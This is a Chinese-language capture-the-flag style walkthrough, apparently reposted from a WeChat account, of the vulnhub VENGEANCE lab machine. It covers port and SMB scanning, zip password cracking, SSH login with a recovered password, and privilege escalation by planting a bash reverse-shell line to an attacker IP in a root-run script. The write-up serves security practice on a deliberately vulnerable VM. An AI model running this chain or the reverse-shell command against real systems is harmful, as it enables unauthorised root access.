今天实践的是vulnhub的VENGEANCE镜像,
下载地址,https://download.vulnhub.com/digitalworld/VENGEANCE.7z,
用workstation导入成功,先做端口扫描,
sudo netdiscover -r 192.168.137.0/24,
接着进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.82,
发现了不少服务,尤其是有smb服务,还有个22222端口的ssh服务,
对smb服务进行扫描,sudo enum4linux 192.168.137.82,
发现了sara和qinyi两个用户,
连接smb,sudo smbclient -L 192.168.137.82,
发现了sarapublic$目录,连接sarapublic$目录,
sudo smbclient //192.168.137.82/sarapublic$,
发现了不少文件,下载profile.txt和gio.zip,
gio.zip解压要密码,猜测密码在profile.txt里,
kali攻击机上启动一个http下载服务,
python2 -m SimpleHTTPServer 80,
把profile.txt里的字符串采集成字典,
sudo cewl 192.168.137.168/profile.txt -w dict.txt,
破解,sudo fcrackzip -D -p dict.txt -u gio.zip,
用得到的密码解压gio.zip,查看文件,pass_reminder.txt里有个提示,
查看ted_talk.pptx,获取到了密码giovanni_130R_Suzuka,
ssh登录靶机,ssh [email protected] -p 22222,
id看一下,不是root,需要进一步提权,
sudo -l看到/home/sara/private/eaurouge是root权限执行的,
但是没有查看和编辑权限,下载pspy64工具进一步获取进程信息,wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64,
执行pspy64发现/home/sara/private目录是tftp服务管理的,
扫描确认,sudo nmap -sU -p69 192.168.137.82,
登录下载eaurouge文件,tftp 192.168.137.82,get eaurouge,
查看eaurouge文件,发现是个bash脚本,
在里面添加反弹shell脚本,bash -c 'exec bash -i &>/dev/tcp/192.168.137.168/8888 <&1',
把文件上传回去,put eaurouge,
kali攻击机上开启nc监听,nc -lvp 8888,
靶机上执行,sudo /home/sara/private/eaurouge,
kali攻击机上获取到shell,id看一下,确认是root。
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之VENGEANCE的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论